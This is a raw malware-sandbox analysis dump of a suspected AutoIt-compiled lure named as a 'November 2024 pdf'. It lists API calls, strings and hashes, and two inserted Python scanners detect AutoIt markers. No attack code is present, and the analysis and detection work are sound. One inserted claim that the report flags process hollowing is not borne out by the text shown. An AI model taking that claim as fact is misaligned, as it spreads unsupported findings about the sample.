                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007C7AC4
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007C7ACE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                      • Opcode ID: 32657b0212789f87f980fd5dc69a635f11475ed40c0a457c8bc896157778ad17
                                                                                                                      • Instruction ID: e53165a38689146095d70d65ad3a15d6337dd2f3573e39b392610ccea0ab1c7e
                                                                                                                      • Opcode Fuzzy Hash: 32657b0212789f87f980fd5dc69a635f11475ed40c0a457c8bc896157778ad17
                                                                                                                      • Instruction Fuzzy Hash: 1CA152B1A40219FFEB149B64DC4AFAA7BB9EF44710F048119FA15A72E0D7B4AD10CB64
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 007BAF89
                                                                                                                      • GetDriveTypeW.KERNEL32(?,007DFAC0,?,\\.\,007DF910), ref: 007BB066
                                                                                                                      • SetErrorMode.KERNEL32(00000000,007DFAC0,?,\\.\,007DF910), ref: 007BB1C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      • Opcode ID: d66ed9d1997ade2798ee1e674a919e73932dc0a2def94af024f66e46982800b8
                                                                                                                      • Instruction ID: f10a289127fd7185805b80f40e641ae034fe766e1d24b0a37beed13fd82ecb9e
                                                                                                                      • Opcode Fuzzy Hash: d66ed9d1997ade2798ee1e674a919e73932dc0a2def94af024f66e46982800b8
                                                                                                                      • Instruction Fuzzy Hash: 6751803068430DEACB18EB28CD96AFD73B1FB543417208015EC6AE72D1D7AD9D46DB52
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                      • Opcode ID: 7bca660fa5059cf1eddb3e2f3f75006e00a17f595bd3d16dd4b9c06a8661cabe
                                                                                                                      • Instruction ID: 70b0ff21b95c7103c137bcda7120331197cac10e4a444329b391683776af94e5
                                                                                                                      • Opcode Fuzzy Hash: 7bca660fa5059cf1eddb3e2f3f75006e00a17f595bd3d16dd4b9c06a8661cabe
                                                                                                                      • Instruction Fuzzy Hash: A481F4B0640345EACF24BA30CC87FEE7768AF15741F548025FD45AB182EBACDA49D391
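The two records above carry the runtime's own marker strings: the AutoIt script-directive parser (the `#include`, `#cs`/`#ce`, `#requireadmin` keywords and their error messages) and the DriveGetType bus-type table (`1394`, `ATAPI`, `PhysicalDrive`, `\\.\`, `iSCSI`, ...), alongside the `AutoIt v3` banner seen earlier. A practical triage step is to confirm those indicators in a new sample or process dump before trusting the "likely a compiled AutoIt script" verdict. The scanner below is an added example written for this page; it is not Joe Sandbox, AutoIt or the sample's own code. It assumes the strings are stored as UTF-16LE in memory (the runtime calls the W-suffixed APIs and `__wcsnicmp`), which is why it checks both ASCII and UTF-16LE; the `MIN_DIRECTIVE_HITS` threshold, the function names and the constructed sample blob are this example's own choices, not something the report states.

```python
"""Triage check for compiled-AutoIt indicators in a PE file or memory dump.

Added example: not part of the sandbox report or the AutoIt runtime.
"""
import sys

# Marker strings taken from the report's String IDs for this sample.
AUTOIT_BANNER = "AutoIt v3"
DIRECTIVES = [
    "#OnAutoItStartRegister", "#ce", "#comments-end", "#comments-start", "#cs",
    "#include", "#include-once", "#notrayicon", "#pragma compile", "#requireadmin",
    "Bad directive syntax error", "Cannot parse #include",
    "Unterminated group of comments",
]
DRIVE_TYPES = [
    "1394", "ATA", "ATAPI", "CDROM", "Fibre", "FileBackedVirtual", "Fixed", "MMC",
    "Network", "PhysicalDrive", "RAID", "RAMDisk", "Removable", "SAS", "SATA",
    "SCSI", "SSA", "SSD", "USB", "Unknown", "Virtual", "\\\\.\\", "iSCSI",
]

# Assumed threshold (this example's choice): how many directive keywords must be
# present, together with the banner, before calling the blob a compiled script.
MIN_DIRECTIVE_HITS = 5


def _encodings(s: str) -> dict:
    # The runtime uses wide-char APIs, so its literals sit in memory as UTF-16LE;
    # an ASCII-only grep misses them.  Look for both forms.
    return {"ascii": s.encode("ascii"), "utf-16le": s.encode("utf-16-le")}


def find_indicators(data: bytes) -> dict:
    """Return the marker strings found in `data`, grouped, with the encodings seen."""
    groups = {"banner": [AUTOIT_BANNER], "directives": DIRECTIVES,
              "drive_types": DRIVE_TYPES}
    hits = {}
    for group, strings in groups.items():
        hits[group] = {}
        for s in strings:
            for enc, needle in _encodings(s).items():
                if needle in data:
                    hits[group].setdefault(s, []).append(enc)
    return hits


def is_compiled_autoit(data: bytes) -> bool:
    """Banner plus enough directive-parser keywords -> treat as compiled AutoIt."""
    hits = find_indicators(data)
    return bool(hits["banner"]) and len(hits["directives"]) >= MIN_DIRECTIVE_HITS


def build_sample_blob(wide: bool = True) -> bytes:
    """Constructed test input (not a real dump): the markers separated by filler."""
    enc = "utf-16-le" if wide else "ascii"
    parts = [AUTOIT_BANNER] + DIRECTIVES + DRIVE_TYPES
    filler = b"\x00" * 4 + bytes(range(16))
    return filler.join(p.encode(enc) for p in parts) + filler


def scan_file(path: str) -> dict:
    """Scan a file on disk (a PE or a .sdmp-style memory dump) and summarise."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {"file": path, "compiled_autoit": is_compiled_autoit(data),
            "indicators": find_indicators(data)}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(scan_file(sys.argv[1]))
    else:
        # No path given: run against the constructed blob so the script is
        # demonstrable offline.
        print(find_indicators(build_sample_blob()))
```

Run it against the extracted memory-dump file (the `.sdmp` listed under Memory Dump Source) rather than only the on-disk PE: the compiled script's strings are plain in the runtime's image either way, but a process dump also shows whether the same markers were later mapped into a hollowed child, which is the behaviour the report flags for this sample. Substring matching is deliberate (`#include` also matches `#include-once`), so treat the directive count as a score, not a proof.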
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 007DAB99
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 007DAB9D
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 007DABB3
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 007DABBE
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 007DABC3
                                                                                                                      • GetSysColor.USER32(00000011), ref: 007DABDB
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DABE9
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 007DABFA
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 007DAC03
                                                                                                                      • SelectObject.GDI32(?,?), ref: 007DAC10
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 007DAC2F
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DAC46
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 007DAC5B
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DACA7
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007DACCE
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 007DACEC
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 007DACF7
                                                                                                                      • GetSysColor.USER32(00000011), ref: 007DAD05
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 007DAD0D
                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007DAD21
                                                                                                                      • SelectObject.GDI32(?,007DA869), ref: 007DAD38
                                                                                                                      • DeleteObject.GDI32(?), ref: 007DAD43
                                                                                                                      • SelectObject.GDI32(?,?), ref: 007DAD49
                                                                                                                      • DeleteObject.GDI32(?), ref: 007DAD4E
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 007DAD54
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 007DAD5E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996641542-0
                                                                                                                      • Opcode ID: 4dc25f77b1e8989d618affb09e4558dbda949a1da7ed41bab61603c348ca263f
                                                                                                                      • Instruction ID: c76b3800723c062a1a7b91d957ba0b25f4a7700233607ff85dcb693cbe3cc70b
                                                                                                                      • Opcode Fuzzy Hash: 4dc25f77b1e8989d618affb09e4558dbda949a1da7ed41bab61603c348ca263f
                                                                                                                      • Instruction Fuzzy Hash: 07614E71901218FFDF119FA4DC48EAE7BB9FB08320F148126F916AB2A1D7799D40DB90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007D8D34
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8D45
                                                                                                                      • CharNextW.USER32(0000014E), ref: 007D8D74
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007D8DB5
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007D8DCB
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8DDC
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007D8DF9
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 007D8E45
                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007D8E5B
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D8E8C
                                                                                                                      • _memset.LIBCMT ref: 007D8EB1
                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007D8EFA
                                                                                                                      • _memset.LIBCMT ref: 007D8F59
                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007D8F83
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 007D8FDB
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 007D9088
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 007D90AA
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D90F4
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D9121
                                                                                                                      • DrawMenuBar.USER32(?), ref: 007D9130
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 007D9158
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                      • Opcode ID: af0ec71f142edc1e36197579ae20bbf1915fe2d1d244c76dc5b43cb9380a6d17
                                                                                                                      • Instruction ID: 8168ca9c236495cfca747a6212305e0a195259ba76f96ffdc3c4702ac26313ab
                                                                                                                      • Opcode Fuzzy Hash: af0ec71f142edc1e36197579ae20bbf1915fe2d1d244c76dc5b43cb9380a6d17
                                                                                                                      • Instruction Fuzzy Hash: 04E17070901209EADF209F64CC88EEE7B79EF05710F108157F95AAA2D1DB789A81DF61
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 007D4C51
                                                                                                                      • GetDesktopWindow.USER32 ref: 007D4C66
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 007D4C6D
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007D4CCF
                                                                                                                      • DestroyWindow.USER32(?), ref: 007D4CFB
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007D4D24
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007D4D42
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007D4D68
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 007D4D7D
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007D4D90
                                                                                                                      • IsWindowVisible.USER32(?), ref: 007D4DB0
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007D4DCB
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007D4DDF
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007D4DF7
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 007D4E1D
                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 007D4E37
                                                                                                                      • CopyRect.USER32(?,?), ref: 007D4E4E
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 007D4EB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                      • Opcode ID: bafb6db0086d8652b5e73d3e287ef1d82dc4292457e25c80b2d22121e68c4a8b
                                                                                                                      • Instruction ID: 89171bd8c8a8c00b88b6e75c959864e31138ea52205fd695d88c40f755599fdd
                                                                                                                      • Opcode Fuzzy Hash: bafb6db0086d8652b5e73d3e287ef1d82dc4292457e25c80b2d22121e68c4a8b
                                                                                                                      • Instruction Fuzzy Hash: 45B14971604341EFDB04DF64C949B5ABBF5BB84310F00891AF99A9B2A1DB79E804CBA5
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528BC
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 007528C4
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528EF
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 007528F7
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0075291C
                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00752939
                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00752949
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0075297C
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00752990
                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 007529AE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 007529CA
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 007529D5
                                                                                                                        • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                                                                                                                        • Part of subcall function 00752344: ScreenToClient.USER32(008167B0,?), ref: 00752374
                                                                                                                        • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                                        • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00751256), ref: 007529FC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                      • Opcode ID: b00b88ff78b6af36c8eaeccb3446e6aa70d6386da7cb9b13d0abcd2a870cc566
                                                                                                                      • Instruction ID: babdacc71580dd8d6cf0604ee7c8c21b0835c7ad1ed51b8af6d20ce3d68fb631
                                                                                                                      • Opcode Fuzzy Hash: b00b88ff78b6af36c8eaeccb3446e6aa70d6386da7cb9b13d0abcd2a870cc566
                                                                                                                      • Instruction Fuzzy Hash: 3FB16F71A4020ADFDB15DFA8DC45BED7BB4FB08311F108229FE16E6290DB78A856CB54
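The function above creates the runtime's hidden "AutoIt v3 GUI" window, and the `__wcsnicmp` function further down carries the title-match prefixes (`[CLASS:`, `[HANDLE:`, `[REGEXPTITLE:`) that AutoIt's WinTitleMatchMode parser understands; together they are the wide strings an analyst greps for when deciding whether a dropper is a compiled AutoIt script. The Python triage script below is an added example and is not part of the Joe Sandbox report: it scans a PE file or a `.sdmp` memory dump for those UTF-16LE markers and for the `AU3!EA06` header that AutoIt3 places in front of an embedded compiled script. The byte buffers in it are constructed for the demonstration and are not taken from this sample.

```python
"""Triage scan for AutoIt v3 runtime markers in a PE image or process memory dump.

Added example. Markers are the wide strings the report lists (window class
"AutoIt v3 GUI", title-match prefixes such as "[CLASS:") plus the ASCII
"AU3!EA06" header AutoIt3 writes in front of an embedded compiled script.
"""
import re
import sys
from typing import Dict, List

# UTF-16LE strings carried by the AutoIt3 runtime itself. "tooltips_class32"
# is deliberately left out: it is a generic Windows class name, not an AutoIt marker.
AUTOIT_WIDE_MARKERS: Dict[str, bytes] = {
    "gui_class": "AutoIt v3 GUI".encode("utf-16-le"),
    "title_class": "[CLASS:".encode("utf-16-le"),
    "title_handle": "[HANDLE:".encode("utf-16-le"),
    "title_regexp": "[REGEXPTITLE:".encode("utf-16-le"),
}
# Header of the compiled-script payload appended to an AutoIt3 executable.
AU3_SCRIPT_MAGIC = b"AU3!EA06"


def scan_autoit_markers(data: bytes) -> Dict[str, List[int]]:
    """Return {marker_name: [byte offsets]} for every marker present in data."""
    hits: Dict[str, List[int]] = {}
    needles = dict(AUTOIT_WIDE_MARKERS, au3_script_magic=AU3_SCRIPT_MAGIC)
    for name, needle in needles.items():
        offsets = [m.start() for m in re.finditer(re.escape(needle), data)]
        if offsets:
            hits[name] = offsets
    return hits


def wide_strings(data: bytes, min_chars: int = 4) -> List[str]:
    """Extract printable UTF-16LE strings (what `strings -el` would show)."""
    run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars)
    return [m.group().decode("utf-16-le") for m in run.finditer(data)]


def verdict(hits: Dict[str, List[int]]) -> str:
    """Summarise the hit set the way an analyst would read it."""
    runtime_hits = [k for k in hits if k != "au3_script_magic"]
    if "au3_script_magic" in hits:
        return "compiled AutoIt script: runtime markers and AU3!EA06 script header present"
    if len(runtime_hits) >= 2:
        return "AutoIt v3 runtime present, no embedded script header (stripped, or in another dump)"
    return "no AutoIt indicators"


# Constructed test buffers (not bytes from the analysed sample): zero padding
# around the markers so the expected offsets are easy to verify by hand.
SAMPLE_COMPILED = (
    b"\x00" * 16
    + "AutoIt v3 GUI".encode("utf-16-le")   # offset 16, 26 bytes
    + b"\x00" * 8
    + "[CLASS:".encode("utf-16-le")         # offset 50, 14 bytes
    + b"\x00" * 4
    + AU3_SCRIPT_MAGIC                      # offset 68
    + b"\x00" * 4
)
SAMPLE_RUNTIME_ONLY = SAMPLE_COMPILED.replace(AU3_SCRIPT_MAGIC, b"\x00" * len(AU3_SCRIPT_MAGIC))


def main(argv: List[str]) -> int:
    """Usage: python autoit_triage.py <file-or-dump>; without a path, scans the constructed buffer."""
    path = argv[1] if len(argv) > 1 else None
    data = open(path, "rb").read() if path else SAMPLE_COMPILED
    hits = scan_autoit_markers(data)
    for name, offsets in hits.items():
        print(f"{name:18s} at " + ", ".join(f"0x{o:x}" for o in offsets))
    print(verdict(hits))
    return 0 if hits else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against the `.sdmp` dumps listed under Memory Dump Source as well as the original file: the runtime strings live in the image mapped at 0x750000, while the `AU3!EA06` header sits in the script overlay of the on-disk executable, so a dump that shows only runtime markers is not evidence that the script was stripped.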
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 007D40F6
                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007D41B6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                      • API String ID: 3974292440-719923060
                                                                                                                      • Opcode ID: 90254a2d79c4fceb9fb0bb7f61d154d6b3b93b6c3b24ad4f003ac56be77266d9
                                                                                                                      • Instruction ID: 58e87bea7be3711170950dd493fb2e259e6f33d66fa0c9e6fdadce1d1b65488b
                                                                                                                      • Opcode Fuzzy Hash: 90254a2d79c4fceb9fb0bb7f61d154d6b3b93b6c3b24ad4f003ac56be77266d9
                                                                                                                      • Instruction Fuzzy Hash: CBA1B030214301DBCB14EF24C845A6AB3B5FF84314F148969B99AAB3D2DB79FC09CB51
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 007C5309
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 007C5314
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 007C531F
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 007C532A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 007C5335
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 007C5340
                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 007C534B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 007C5356
                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 007C5361
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 007C536C
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 007C5377
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 007C5382
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 007C538D
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 007C5398
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 007C53A3
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 007C53AE
                                                                                                                      • GetCursorInfo.USER32(?), ref: 007C53BE
